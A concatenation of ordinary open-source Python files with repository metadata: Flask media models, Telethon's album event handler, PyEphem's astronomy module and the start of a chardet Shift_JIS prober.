    def __unicode__(self):
        return self.email
@login_manager.user_loader
def load_user(user_id):
    """
    Return the user for the given id.

    Required by the login manager.
    """
    return User.query.get(int(user_id))
class File(db.Model):
    # Uploaded file stored under MEDIA_ROOT; `path` is relative to it.
    id = db.Column(db.Integer, primary_key=True)
    name = db.Column(db.Unicode(64), nullable=False)
    path = db.Column(db.Unicode(256), nullable=False)
    language = db.Column(ChoiceType(LANGUAGES_CHOICES), nullable=True)

    def __unicode__(self):
        return self.name

    @property
    def get_absolute_url(self):
        # Public URL: MEDIA_URL + relative path.
        media_url = current_app.config['MEDIA_URL']
        return '%s/%s' % (media_url, self.path)
# Delete hooks: remove the file on disk when the model row is deleted
@listens_for(File, 'after_delete')
def delelte_file_hook(mapper, connection, target):
    # NOTE(review): "delelte" is a typo for "delete"; the name is kept
    # unchanged in case it is referenced elsewhere.
    if target.path:
        media_root = current_app.config['MEDIA_ROOT']
        try:
            os.remove(os.path.join(media_root, target.path))
        except OSError:
            pass  # Errors do not matter here: the file is already gone
class Image(db.Model):
    # Uploaded image stored under MEDIA_ROOT; a thumbnail lives next to
    # it at the path produced by thumbgen_filename.
    id = db.Column(db.Integer, primary_key=True)
    name = db.Column(db.Unicode(64), nullable=False)
    path = db.Column(db.Unicode(256), nullable=False)
    language = db.Column(ChoiceType(LANGUAGES_CHOICES), nullable=True)

    def __unicode__(self):
        return self.name

    @property
    def get_absolute_url(self):
        # Public URL: MEDIA_URL + relative path.
        media_url = current_app.config['MEDIA_URL']
        return '%s/%s' % (media_url, self.path)

    @property
    def get_thumbnail_absolute_url(self):
        # Public URL of the generated thumbnail.
        media_url = current_app.config['MEDIA_URL']
        thumb_path = thumbgen_filename(self.path)
        return '%s/%s' % (media_url, thumb_path)
# Delete hooks: remove the image and its thumbnail when the row is deleted
@listens_for(Image, 'after_delete')
def delelte_image_hook(mapper, connection, target):
    # NOTE(review): "delelte" is a typo for "delete"; name kept as-is.
    if target.path:
        media_root = current_app.config['MEDIA_ROOT']
        # Remove the image
        try:
            os.remove(os.path.join(media_root, target.path))
        except OSError:
            pass  # Errors do not matter here: the file is already gone
        # Remove the thumbnail
        try:
            thumb_path = thumbgen_filename(target.path)
            os.remove(os.path.join(media_root, thumb_path))
        except OSError:
            pass  # Errors do not matter here: the file is already gone
| {
"content_hash": "d69c73d6abb9992e04d8d9b0abbd45fc",
"timestamp": "",
"source": "github",
"line_count": 150,
"max_line_length": 107,
"avg_line_length": 32.973333333333336,
"alnum_prop": 0.6502224019409624,
"repo_name": "jamilatta/opac",
"id": "a6e8a0b020c57cb18ec97a1cf8ac8df17134568e",
"size": "4993",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "opac/webapp/models.py",
"mode": "33188",
"license": "bsd-2-clause",
"language": [
{
"name": "CSS",
"bytes": "3802"
},
{
"name": "HTML",
"bytes": "161613"
},
{
"name": "JavaScript",
"bytes": "572996"
},
{
"name": "Makefile",
"bytes": "4437"
},
{
"name": "Mako",
"bytes": "412"
},
{
"name": "Python",
"bytes": "536490"
}
],
"symlink_target": ""
} |
import time
from .common import EventBuilder, EventCommon, name_inner_event
from .. import utils
from ..tl import types
from ..tl.custom.sendergetter import SenderGetter
_IGNORE_MAX_SIZE = 100 # len()
_IGNORE_MAX_AGE = 5 # seconds
# IDs to ignore, and when they were added. If it grows too large, we will
# remove old entries. Although it should generally not be bigger than 10,
# it may be possible some updates are not processed and thus not removed.
_IGNORE_DICT = {}
@name_inner_event
class Album(EventBuilder):
"""
Occurs whenever you receive an album. This event only exists
to ease dealing with an unknown amount of messages that belong
to the same album.
Example
.. code-block:: python
from telethon import events
@client.on(events.Album)
async def handler(event):
# Counting how many photos or videos the album has
print('Got an album with', len(event), 'items')
# Forwarding the album as a whole to some chat
event.forward_to(chat)
# Printing the caption
print(event.text)
# Replying to the fifth item in the album
await event.messages[4].reply('Cool!')
"""
    def __init__(
            self, chats=None, *, blacklist_chats=False, func=None):
        """Pass the standard EventBuilder filters through unchanged."""
        super().__init__(chats, blacklist_chats=blacklist_chats, func=func)
    @classmethod
    def build(cls, update, others=None, self_id=None):
        """Build an ``Album.Event`` from ``update`` if it is part of one.

        ``others`` are the sibling updates delivered in the same
        ``Updates`` container; only the first grouped update produces
        the event, the rest are added to the module-level ignore dict.
        """
        if not others:
            return  # We only care about albums which come inside the same Updates
        if isinstance(update,
                      (types.UpdateNewMessage, types.UpdateNewChannelMessage)):
            if not isinstance(update.message, types.Message):
                return  # We don't care about MessageService's here
            group = update.message.grouped_id
            if group is None:
                return  # It must be grouped
            # Check whether we are supposed to skip this update, and
            # if we do also remove it from the ignore list since we
            # won't need to check against it again.
            if _IGNORE_DICT.pop(id(update), None):
                return
            # Check if the ignore list is too big, and if it is clean it
            now = time.time()
            if len(_IGNORE_DICT) > _IGNORE_MAX_SIZE:
                for i in [i for i, t in _IGNORE_DICT.items() if now - t > _IGNORE_MAX_AGE]:
                    del _IGNORE_DICT[i]
            # Add the other updates to the ignore list
            for u in others:
                if u is not update:
                    _IGNORE_DICT[id(u)] = now
            # Figure out which updates share the same group and use those
            return cls.Event([
                u.message for u in others
                if (isinstance(u, (types.UpdateNewMessage, types.UpdateNewChannelMessage))
                    and isinstance(u.message, types.Message)
                    and u.message.grouped_id == group)
            ])
class Event(EventCommon, SenderGetter):
"""
Represents the event of a new album.
Members:
messages (Sequence[`Message <telethon.tl.custom.message.Message>`]):
The list of messages belonging to the same album.
"""
        def __init__(self, messages):
            # Derive the event's chat peer from the first message;
            # presumably all messages in an album share chat and sender.
            message = messages[0]
            if not message.out and isinstance(message.to_id, types.PeerUser):
                # Incoming message (e.g. from a bot) has to_id=us, and
                # from_id=bot (the actual "chat" from a user's perspective).
                chat_peer = types.PeerUser(message.from_id)
            else:
                chat_peer = message.to_id
            super().__init__(chat_peer=chat_peer,
                             msg_id=message.id, broadcast=bool(message.post))
            SenderGetter.__init__(self, message.sender_id)
            self.messages = messages
        def _set_client(self, client):
            # Resolve the sender entity/input-entity pair from the
            # client's entity cache, then late-bind the client on each
            # message in the album.
            super()._set_client(client)
            self._sender, self._input_sender = utils._get_entity_pair(
                self.sender_id, self._entities, client._entity_cache)
            for msg in self.messages:
                msg._finish_init(client, self._entities, None)
        @property
        def grouped_id(self):
            """
            The shared ``grouped_id`` between all the messages.
            """
            # `build` collected every message with this same id, so the
            # first one is representative.
            return self.messages[0].grouped_id
@property
def text(self):
"""
The message text of the first photo with a caption,
formatted using the client's default parse mode.
"""
return next((m.text for m in self.messages if m.text), '')
@property
def raw_text(self):
"""
The raw message text of the first photo
with a caption, ignoring any formatting.
"""
return next((m.raw_text for m in self.messages if m.raw_text), '')
        @property
        def is_reply(self):
            """
            `True` if the album is a reply to some other message.

            Remember that you can access the ID of the message
            this one is replying to through `reply_to_msg_id`,
            and the `Message` object with `get_reply_message()`.
            """
            # Each individual message in an album all reply to the same message
            return self.messages[0].is_reply
@property
def forward(self):
"""
The `Forward <telethon.tl.custom.forward.Forward>`
information for the first message in the album if it was forwarded.
"""
# Each individual message in an album all reply to the same message
return self.messages[0].forward
# endregion Public Properties
# region Public Methods
async def get_reply_message(self):
"""
The `Message <telethon.tl.custom.message.Message>`
that this album is replying to, or `None`.
The result will be cached after its first use.
"""
return await self.messages[0].get_reply_message()
async def respond(self, *args, **kwargs):
"""
Responds to the album (not as a reply). Shorthand for
`telethon.client.messages.MessageMethods.send_message`
with ``entity`` already set.
"""
return await self.messages[0].respond(*args, **kwargs)
async def reply(self, *args, **kwargs):
"""
Replies to the first photo in the album (as a reply). Shorthand
for `telethon.client.messages.MessageMethods.send_message`
with both ``entity`` and ``reply_to`` already set.
"""
return await self.messages[0].reply(*args, **kwargs)
async def forward_to(self, *args, **kwargs):
"""
Forwards the entire album. Shorthand for
`telethon.client.messages.MessageMethods.forward_messages`
with both ``messages`` and ``from_peer`` already set.
"""
if self._client:
kwargs['messages'] = self.messages
kwargs['as_album'] = True
kwargs['from_peer'] = await self.get_input_chat()
return await self._client.forward_messages(*args, **kwargs)
async def edit(self, *args, **kwargs):
"""
Edits the first caption or the message, or the first messages'
caption if no caption is set, iff it's outgoing. Shorthand for
`telethon.client.messages.MessageMethods.edit_message`
with both ``entity`` and ``message`` already set.
Returns `None` if the message was incoming,
or the edited `Message` otherwise.
.. note::
This is different from `client.edit_message
<telethon.client.messages.MessageMethods.edit_message>`
and **will respect** the previous state of the message.
For example, if the message didn't have a link preview,
the edit won't add one by default, and you should force
it by setting it to `True` if you want it.
This is generally the most desired and convenient behaviour,
and will work for link previews and message buttons.
"""
for msg in self.messages:
if msg.raw_text:
return await msg.edit(*args, **kwargs)
return await self.messages[0].edit(*args, **kwargs)
async def delete(self, *args, **kwargs):
"""
Deletes the entire album. You're responsible for checking whether
you have the permission to do so, or to except the error otherwise.
Shorthand for
`telethon.client.messages.MessageMethods.delete_messages` with
``entity`` and ``message_ids`` already set.
"""
if self._client:
return await self._client.delete_messages(
await self.get_input_chat(), self.messages,
*args, **kwargs
)
async def mark_read(self):
"""
Marks the entire album as read. Shorthand for
`client.send_read_acknowledge()
<telethon.client.messages.MessageMethods.send_read_acknowledge>`
with both ``entity`` and ``message`` already set.
"""
if self._client:
await self._client.send_read_acknowledge(
await self.get_input_chat(), max_id=self.messages[-1].id)
async def pin(self, *, notify=False):
"""
Pins the first photo in the album. Shorthand for
`telethon.client.messages.MessageMethods.pin_message`
with both ``entity`` and ``message`` already set.
"""
await self.messages[0].pin(notify=notify)
def __len__(self):
"""
Return the amount of messages in the album.
Equivalent to ``len(self.messages)``.
"""
return len(self.messages)
def __iter__(self):
"""
Iterate over the messages in the album.
Equivalent to ``iter(self.messages)``.
"""
return iter(self.messages)
def __getitem__(self, n):
"""
Access the n'th message in the album.
Equivalent to ``event.messages[n]``.
"""
return self.messages[n]
| {
"content_hash": "0f0066c8c6f8a94a7d62cdf2fd40bb10",
"timestamp": "",
"source": "github",
"line_count": 286,
"max_line_length": 91,
"avg_line_length": 37.43356643356643,
"alnum_prop": 0.5535213898748366,
"repo_name": "expectocode/Telethon",
"id": "2ba1e61b0d6c5857a50dc344aac58e1719834f23",
"size": "10706",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "telethon/events/album.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Batchfile",
"bytes": "776"
},
{
"name": "Makefile",
"bytes": "605"
},
{
"name": "Python",
"bytes": "443578"
}
],
"symlink_target": ""
} |
import ephem._libastro as _libastro
from math import pi
__version__ = '3.7.5.1'
# Angular constants, all expressed in radians (the unit that the
# _libastro extension module works in).
twopi = pi * 2.
halfpi = pi / 2.
quarterpi = pi / 4.
eighthpi = pi / 8.
degree = twopi / 360.
arcminute = degree / 60.
arcsecond = arcminute / 60.
half_arcsecond = arcsecond / 2.
tiny = arcsecond / 360.
c = 299792458. # exact speed of light in meters/second
# Physical constants re-exported from the C extension.
meters_per_au = _libastro.meters_per_au
earth_radius = _libastro.earth_radius
moon_radius = _libastro.moon_radius
sun_radius = _libastro.sun_radius
# Standard epochs, converted from Julian dates by subtracting the
# extension module's day-number offset MJD0.
B1900 = 2415020.3135 - _libastro.MJD0
B1950 = 2433282.4235 - _libastro.MJD0
J2000 = _libastro.J2000
# We make available several basic types from _libastro.
Angle = _libastro.Angle
degrees = _libastro.degrees
hours = _libastro.hours
Date = _libastro.Date
# Time constants as fractions of a day, matching Date arithmetic.
hour = 1. / 24.
minute = hour / 60.
second = minute / 60.
default_newton_precision = second / 10.
delta_t = _libastro.delta_t
julian_date = _libastro.julian_date
# Body classes and helper routines re-exported from the C extension.
Body = _libastro.Body
Planet = _libastro.Planet
PlanetMoon = _libastro.PlanetMoon
FixedBody = _libastro.FixedBody
EllipticalBody = _libastro.EllipticalBody
ParabolicBody = _libastro.ParabolicBody
HyperbolicBody = _libastro.HyperbolicBody
EarthSatellite = _libastro.EarthSatellite
readdb = _libastro.readdb
readtle = _libastro.readtle
constellation = _libastro.constellation
separation = _libastro.separation
now = _libastro.now
# Star-atlas page lookup helpers.
millennium_atlas = _libastro.millennium_atlas
uranometria = _libastro.uranometria
uranometria2000 = _libastro.uranometria2000
# We also create a Python class ("Mercury", "Venus", etcetera) for
# each planet and moon for which _libastro offers specific algorithms.
# NOTE: the statement form of ``exec`` below is Python 2 syntax.
for index, classname, name in _libastro.builtin_planets():
    exec '''
class %s(_libastro.%s):
    __planet__ = %r
''' % (name, classname, index)
del index, classname, name
# We now replace some of the classes we have just created, because
# _libastro actually provides separate types for these bodies.
Jupiter = _libastro.Jupiter
Saturn = _libastro.Saturn
Moon = _libastro.Moon
# Newton's method.
def newton(f, x0, x1, precision=default_newton_precision):
    """Return an x-value at which the given function reaches zero.
    Stops and declares victory once the x-value is within ``precision``
    of the solution, which defaults to a half-second of clock time.
    """
    # Secant iteration: step from the last two samples toward the root
    # until the function vanishes, the step shrinks below ``precision``,
    # or two successive function values coincide (no further progress).
    prev_x, cur_x = x0, x1
    prev_f, cur_f = f(prev_x), f(cur_x)
    while cur_f and abs(cur_x - prev_x) > precision and cur_f != prev_f:
        next_x = cur_x + (cur_x - prev_x) / (prev_f / cur_f - 1)
        prev_x, prev_f = cur_x, cur_f
        cur_x = next_x
        cur_f = f(cur_x)
    return cur_x
# Find equinoxes and solstices.
_sun = Sun() # used for computing equinoxes
def holiday(d0, motion, offset):
    """Function that assists the finding of equinoxes and solstices."""
    # Signed distance of the Sun's RA from the nearest multiple of a
    # quarter circle; the zero of this function is the event we seek.
    def quarter_offset(when):
        _sun.compute(when)
        return (_sun.ra + eighthpi) % quarterpi - eighthpi
    start = Date(d0)
    _sun.compute(start)
    angle_to_cover = motion - (_sun.ra + offset) % motion
    if abs(angle_to_cover) < tiny:
        angle_to_cover = motion
    # Leap roughly a year's worth of days per full turn, then refine.
    rough = start + 365.25 * angle_to_cover / twopi
    return date(newton(quarter_offset, rough, rough + hour))
# Each wrapper hands holiday() a direction (the sign of ``motion``) and
# the solar angle at which the event in question occurs (``offset``).
def previous_vernal_equinox(date):
    """Return the date of the previous vernal equinox."""
    return holiday(date, -twopi, 0)
def next_vernal_equinox(date):
    """Return the date of the next vernal equinox."""
    return holiday(date, twopi, 0)
def previous_summer_solstice(date):
    """Return the date of the previous summer solstice."""
    return holiday(date, -twopi, pi + halfpi)
def next_summer_solstice(date):
    """Return the date of the next summer solstice."""
    return holiday(date, twopi, pi + halfpi)
def previous_autumnal_equinox(date):
    """Return the date of the previous autumnal equinox."""
    return holiday(date, -twopi, pi)
def next_autumnal_equinox(date):
    """Return the date of the next autumnal equinox."""
    return holiday(date, twopi, pi)
def previous_winter_solstice(date):
    """Return the date of the previous winter solstice."""
    return holiday(date, -twopi, halfpi)
def next_winter_solstice(date):
    """Return the date of the next winter solstice."""
    return holiday(date, twopi, halfpi)
# Common synonyms.
next_spring_equinox = next_vernal_equinox
previous_spring_equinox = previous_vernal_equinox
next_fall_equinox = next_autumn_equinox = next_autumnal_equinox
previous_fall_equinox = previous_autumn_equinox = previous_autumnal_equinox
# More-general functions that find any equinox or solstice.
# A half-turn motion (pi instead of twopi) reaches whichever of the two
# matching events comes first in the chosen direction.
def previous_equinox(date):
    """Return the date of the previous equinox."""
    return holiday(date, -pi, 0)
def next_equinox(date):
    """Return the date of the next equinox."""
    return holiday(date, pi, 0)
def previous_solstice(date):
    """Return the date of the previous solstice."""
    return holiday(date, -pi, halfpi)
def next_solstice(date):
    """Return the date of the next solstice."""
    return holiday(date, pi, halfpi)
# Find phases of the Moon.
_moon = Moon() # used for computing Moon phases
def _find_moon_phase(d0, motion, target):
    """Function that assists the finding of moon phases."""
    # ``f`` measures how far the Moon's ecliptic elongation from the Sun
    # lies from ``target``.  Note the closure: ``antitarget`` is assigned
    # *after* this def, but before ``f`` is ever called, so the late
    # binding is safe.
    def f(d):
        _sun.compute(d)
        _moon.compute(d)
        slon = _libastro.eq_ecl(d, _sun.g_ra, _sun.g_dec)[0]
        mlon = _libastro.eq_ecl(d, _moon.g_ra, _moon.g_dec)[0]
        return (mlon - slon - antitarget) % twopi - pi
    antitarget = target + pi
    d0 = Date(d0)
    f0 = f(d0)
    angle_to_cover = (- f0) % motion
    if abs(angle_to_cover) < tiny:
        angle_to_cover = motion
    # 29.53 days is the mean synodic month: one full phase cycle.
    d = d0 + 29.53 * angle_to_cover / twopi
    return date(newton(f, d, d + hour))
# The target angle is the Moon's elongation from the Sun at each
# principal phase: 0 = new, pi/2 = first quarter, pi = full,
# pi + pi/2 = last quarter; the sign of the motion picks the direction.
def previous_new_moon(date):
    """Return the date of the previous New Moon."""
    return _find_moon_phase(date, -twopi, 0)
def next_new_moon(date):
    """Return the date of the next New Moon."""
    return _find_moon_phase(date, twopi, 0)
def previous_first_quarter_moon(date):
    """Return the date of the previous First Quarter Moon."""
    return _find_moon_phase(date, -twopi, halfpi)
def next_first_quarter_moon(date):
    """Return the date of the next First Quarter Moon."""
    return _find_moon_phase(date, twopi, halfpi)
def previous_full_moon(date):
    """Return the date of the previous Full Moon."""
    return _find_moon_phase(date, -twopi, pi)
def next_full_moon(date):
    """Return the date of the next Full Moon."""
    return _find_moon_phase(date, twopi, pi)
def previous_last_quarter_moon(date):
    """Return the date of the previous Last Quarter Moon."""
    return _find_moon_phase(date, -twopi, pi + halfpi)
def next_last_quarter_moon(date):
    """Return the date of the next Last Quarter Moon."""
    return _find_moon_phase(date, twopi, pi + halfpi)
# We provide a Python extension to our _libastro "Observer" class that
# can search for circumstances like transits.
class CircumpolarError(ValueError):
    """A declination circles the pole and cannot rise or set normally."""
class NeverUpError(CircumpolarError):
    """The object never climbs above the observer's horizon."""
class AlwaysUpError(CircumpolarError):
    """The object never sinks below the observer's horizon."""
class Observer(_libastro.Observer):
    """An observing location that can search for transits and risings."""
    # The single extra attribute beyond the C-level struct: an optional
    # human-readable name for the location.
    __slots__ = [ 'name' ]
    # Backwards-compatible alias for the ``elevation`` property.
    elev = _libastro.Observer.elevation
    def __repr__(self):
        """Return a useful textual representation of this Observer."""
        return ('<ephem.Observer date=%r epoch=%r'
                ' lon=%s lat=%s elevation=%sm'
                ' horizon=%s temp=%sC pressure=%smBar>'
                % (str(self.date), str(self.epoch),
                   self.lon, self.lat, self.elevation,
                   self.horizon, self.temp, self.pressure))
    def compute_pressure(self):
        """Set the atmospheric pressure for the current elevation."""
        # Formula from the ISA Standard Atmosphere
        self.pressure = (1013.25 * (1 - 0.0065 * self.elevation / 288.15)
                         ** 5.2558761132785179)
    def _compute_transit(self, body, start, sign, offset):
        """Internal function used to compute transits.

        Note: moves ``self.date``; the public wrappers restore it.
        """
        if isinstance(body, EarthSatellite):
            raise TypeError(
                'the next and previous transit methods do not'
                ' support earth satellites because of their speed;'
                ' please use the higher-resolution next_pass() method'
                )
        # ``f`` is the hour-angle error that Newton's method drives to
        # zero.  It closes over ``sidereal_time``, which is bound a few
        # lines below -- before ``f`` is ever called.
        def f(d):
            self.date = d
            body.compute(self)
            return degrees(offset - sidereal_time() + body.g_ra).znorm
        if start is not None:
            self.date = start
        sidereal_time = self.sidereal_time
        body.compute(self)
        ha = sidereal_time() - body.g_ra
        # Hour angle still to travel, in the requested direction.
        ha_to_move = (offset - ha) % (sign * twopi)
        if abs(ha_to_move) < tiny:
            ha_to_move = sign * twopi
        # Jump roughly to the event (one turn of hour angle ~ one day),
        # then let Newton's method refine the answer.
        d = self.date + ha_to_move / twopi
        result = Date(newton(f, d, d + minute))
        return result
    # The private helpers below leave ``self.date`` at the solution;
    # the public wrappers further down restore it before returning.
    def _previous_transit(self, body, start=None):
        """Find the previous passage of a body across the meridian."""
        return self._compute_transit(body, start, -1., 0.)
    def _next_transit(self, body, start=None):
        """Find the next passage of a body across the meridian."""
        return self._compute_transit(body, start, +1., 0.)
    def _previous_antitransit(self, body, start=None):
        """Find the previous passage of a body across the anti-meridian."""
        return self._compute_transit(body, start, -1., pi)
    def _next_antitransit(self, body, start=None):
        """Find the next passage of a body across the anti-meridian."""
        return self._compute_transit(body, start, +1., pi)
    def previous_transit(self, body, start=None):
        """Find the previous passage of a body across the meridian."""
        original_date = self.date
        d = self._previous_transit(body, start)
        self.date = original_date
        return d
    def next_transit(self, body, start=None):
        """Find the next passage of a body across the meridian."""
        original_date = self.date
        d = self._next_transit(body, start)
        self.date = original_date
        return d
    def previous_antitransit(self, body, start=None):
        """Find the previous passage of a body across the anti-meridian."""
        original_date = self.date
        d = self._previous_antitransit(body, start)
        self.date = original_date
        return d
    def next_antitransit(self, body, start=None):
        """Find the next passage of a body across the anti-meridian."""
        original_date = self.date
        d = self._next_antitransit(body, start)
        self.date = original_date
        return d
    def disallow_circumpolar(self, declination):
        """Raise an exception if the given declination is circumpolar.
        Raises NeverUpError if an object at the given declination is
        always below this Observer's horizon, or AlwaysUpError if such
        an object would always be above the horizon.
        """
        if abs(self.lat - declination) >= halfpi:
            raise NeverUpError('The declination %s never rises'
                               ' above the horizon at latitude %s'
                               % (declination, self.lat))
        if abs(self.lat + declination) >= halfpi:
            raise AlwaysUpError('The declination %s is always'
                                ' above the horizon at latitude %s'
                                % (declination, self.lat))
    def _riset_helper(self, body, start, use_center, rising, previous):
        """Internal function for finding risings and settings.

        Brackets the horizon crossing between a transit and an
        antitransit, then lets Newton's method find the exact moment the
        body's altitude equals the horizon.
        """
        if isinstance(body, EarthSatellite):
            raise TypeError(
                'the rising and settings methods do not'
                ' support earth satellites because of their speed;'
                ' please use the higher-resolution next_pass() method'
                )
        def visit_transit():
            d = (previous and self._previous_transit(body)
                 or self._next_transit(body)) # if-then
            # At transit the body is at its highest; if even that is
            # below the horizon, it never rises today.
            if body.alt + body.radius * use_radius - self.horizon <= 0:
                raise NeverUpError('%r transits below the horizon at %s'
                                   % (body.name, d))
            return d
        def visit_antitransit():
            d = (previous and self._previous_antitransit(body)
                 or self._next_antitransit(body)) # if-then
            # At antitransit the body is at its lowest; if even that is
            # above the horizon, it never sets today.
            if body.alt + body.radius * use_radius - self.horizon >= 0:
                raise AlwaysUpError('%r is still above the horizon at %s'
                                    % (body.name, d))
            return d
        # Determine whether we should offset the result for the radius
        # of the object being measured, or instead pretend that rising
        # and setting happens when its center crosses the horizon.
        if use_center:
            use_radius = 0.0
        else:
            use_radius = 1.0
        # Save self.date so that we can restore it before returning.
        original_date = self.date
        # Start slightly to one side of the start date, to prevent
        # repeated calls from returning the same solution over and over.
        if start is not None:
            self.date = start
        if previous:
            self.date -= default_newton_precision
        else:
            self.date += default_newton_precision
        # Take a big leap towards the solution, then Newton takes us home.
        body.compute(self)
        heading_downward = (rising == previous) # "==" is inverted "xor"
        if heading_downward:
            on_lower_cusp = (body.alt + body.radius * use_radius
                             - self.horizon > tiny)
        else:
            on_lower_cusp = (body.alt + body.radius * use_radius
                             - self.horizon < - tiny)
        az = body.az
        on_right_side_of_sky = ((rising == (az < pi)) # inverted "xor"
                                or (az < tiny
                                    or pi - tiny < az < pi + tiny
                                    or twopi - tiny < az))
        # Choose bracketing endpoints d0 and d1 so that the horizon
        # crossing we want lies between them.
        if on_lower_cusp and on_right_side_of_sky:
            d0 = self.date
        elif heading_downward:
            d0 = visit_transit()
        else:
            d0 = visit_antitransit()
        if heading_downward:
            d1 = visit_antitransit()
        else:
            d1 = visit_transit()
        # Altitude above (or below) the effective horizon; its zero is
        # the moment of rising or setting.
        def f(d):
            self.date = d
            body.compute(self)
            return body.alt + body.radius * use_radius - self.horizon
        d = (d0 + d1) / 2.
        result = Date(newton(f, d, d + minute))
        self.date = original_date
        return result
    def previous_rising(self, body, start=None, use_center=False):
        """Move to the given body's previous rising, returning the date."""
        return self._riset_helper(body, start, use_center, True, True)
    def previous_setting(self, body, start=None, use_center=False):
        """Move to the given body's previous setting, returning the date."""
        return self._riset_helper(body, start, use_center, False, True)
    def next_rising(self, body, start=None, use_center=False):
        """Move to the given body's next rising, returning the date."""
        return self._riset_helper(body, start, use_center, True, False)
    def next_setting(self, body, start=None, use_center=False):
        """Move to the given body's next setting, returning the date."""
        return self._riset_helper(body, start, use_center, False, False)
    def next_pass(self, body):
        """Return the next rising, culmination, and setting of a satellite."""
        if not isinstance(body, EarthSatellite):
            raise TypeError(
                'the next_pass() method is only for use with'
                ' EarthSatellite objects because of their high speed'
                )
        return _libastro._next_pass(self, body)
# Time conversion.
def localtime(date):
    """Convert a PyEphem date into local time, returning a Python datetime.

    ``date.tuple()`` is interpreted as a UTC (year, month, day, hour,
    minute, second) tuple and converted into the local time zone.
    """
    import calendar, time, datetime
    timetuple = time.localtime(calendar.timegm(date.tuple()))
    # BUG FIX: slice to [:6] -- (year, mon, mday, hour, min, sec).  The
    # previous [:7] also passed struct_time's tm_wday (the weekday, 0-6)
    # as the datetime's microsecond argument, which is meaningless.
    return datetime.datetime(*timetuple[:6])
# Coordinate transformations.
class Coordinate(object):
    """Base class for positions on the sky in a particular epoch.

    Subclasses provide ``get``/``set`` plus ``to_radec``/``from_radec``
    so that any coordinate kind can be built from a Body, from another
    coordinate (converting and precessing as needed), or from a raw
    pair of values.
    """
    def __init__(self, *args, **kw):
        # Accept an optional "epoch" keyword argument.
        epoch = kw.pop('epoch', None)
        if epoch is not None:
            self.epoch = epoch = Date(epoch)
        if kw:
            raise TypeError('"epoch" is the only keyword argument'
                            ' you can use during %s instantiation'
                            % (type(self).__name__))
        # Interpret a single-argument initialization.
        if len(args) == 1:
            a = args[0]
            if isinstance(a, Body):
                # Use the body's astrometric position and its own epoch.
                a = Equatorial(a.a_ra, a.a_dec, epoch=a.a_epoch)
            for cls in (Equatorial, Ecliptic, Galactic):
                if isinstance(a, cls):
                    # If the user omitted an "epoch" keyword, then
                    # use the epoch of the other object.
                    if epoch is None:
                        self.epoch = epoch = a.epoch
                    # If we are initialized from another of the same
                    # kind of coordinate and epoch, simply copy the
                    # coordinates and epoch into this new object.
                    if isinstance(self, cls) and epoch == a.epoch:
                        self.set(*a.get())
                        return
                    # Otherwise, convert through (ra, dec), precessing
                    # when the epochs differ.
                    ra, dec = a.to_radec()
                    if epoch != a.epoch:
                        ra, dec = _libastro.precess(
                            a.epoch, epoch, ra, dec
                        )
                    self.from_radec(ra, dec)
                    return
            # BUG FIX: the format tuple previously held only one value
            # for the two "%s"/"%r" specifiers, so raising this error
            # itself raised a "not enough arguments" TypeError.
            raise TypeError(
                'a single argument used to initialize %s() must be either'
                ' a coordinate or a Body, not an %r'
                % (type(self).__name__, type(a).__name__)
            )
        # Two arguments are interpreted as (ra, dec) or (lon, lat).
        elif len(args) == 2:
            self.set(*args)
            if epoch is None:
                self.epoch = epoch = Date('2000')
        else:
            raise TypeError(
                'to initialize %s you must pass either a Body,'
                ' another coordinate, or two coordinate values,'
                ' but not: %r' % (type(self).__name__, args,)
            )
class Equatorial(Coordinate):
    """A right-ascension and declination pair for a given epoch."""
    def get(self):
        return self.ra, self.dec
    def set(self, ra, dec):
        # ``hours()`` and ``degrees()`` come from _libastro (module top).
        self.ra, self.dec = hours(ra), degrees(dec)
    # Equatorial *is* the (ra, dec) system, so converting to and from
    # equatorial coordinates is the identity.
    to_radec = get
    from_radec = set
class LonLatCoordinate(Coordinate):
    """A coordinate expressed as a (longitude, latitude) pair."""
    def set(self, lon, lat):
        self.lon, self.lat = degrees(lon), degrees(lat)
    def get(self):
        return self.lon, self.lat
class Ecliptic(LonLatCoordinate):
    """Ecliptic longitude and latitude for a given epoch."""
    # ecl_eq / eq_ecl convert between ecliptic and equatorial
    # coordinates for the stored epoch, in the C extension.
    def to_radec(self):
        return _libastro.ecl_eq(self.epoch, self.lon, self.lat)
    def from_radec(self, ra, dec):
        self.lon, self.lat = _libastro.eq_ecl(self.epoch, ra, dec)
class Galactic(LonLatCoordinate):
    """Galactic longitude and latitude for a given epoch."""
    def to_radec(self):
        return _libastro.gal_eq(self.epoch, self.lon, self.lat)
    def from_radec(self, ra, dec):
        self.lon, self.lat = _libastro.eq_gal(self.epoch, ra, dec)
# For backwards compatibility, provide lower-case names for our Date
# and Angle classes, and also allow "Lon" to be spelled "Long".
# These are plain aliases: each pair of names refers to one object.
date = Date
angle = Angle
LongLatCoordinate = LonLatCoordinate
# Catalog bootstraps.  Each of these functions imports a catalog
# module, then replaces itself with the function of the same name that
# lives inside of the catalog.
def star(name, *args, **kwargs):
    """Load the stars database and return a star."""
    # On first call, rebind the module-level name ``star`` to the real
    # implementation so that later calls skip this import entirely.
    global star
    import ephem.stars
    star = ephem.stars.star
    return star(name, *args, **kwargs)
def city(name):
    """Load the cities database and return a city."""
    # Same self-replacing bootstrap trick as star() above: the first
    # call rebinds the module-level name to the real implementation.
    global city
    import ephem.cities
    city = ephem.cities.city
    return city(name)
| {
"content_hash": "5c302604d3788d0427a7c9968338308b",
"timestamp": "",
"source": "github",
"line_count": 589,
"max_line_length": 78,
"avg_line_length": 33.62308998302207,
"alnum_prop": 0.6040698848717431,
"repo_name": "bennettscience/PySky",
"id": "d26722004691de81b465af53192eff2411c54d4d",
"size": "19964",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "pyephem-3.7.5.1/build/lib.macosx-10.8-intel-2.7/ephem/__init__.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "1350"
}
],
"symlink_target": ""
} |
from .chardistribution import SJISDistributionAnalysis
from .codingstatemachine import CodingStateMachine
from .enums import MachineState, ProbingState
from .jpcntx import SJISContextAnalysis
from .mbcharsetprober import MultiByteCharSetProber
from .mbcssm import SJIS_SM_MODEL
class SJISProber(MultiByteCharSetProber):
    """Probes byte sequences for the Shift_JIS (Japanese) encoding.

    Combines a coding state machine (structural validity of the byte
    stream) with a character-distribution and a context analysis, and
    reports the larger confidence of the latter two.
    """
    def __init__(self):
        super().__init__()
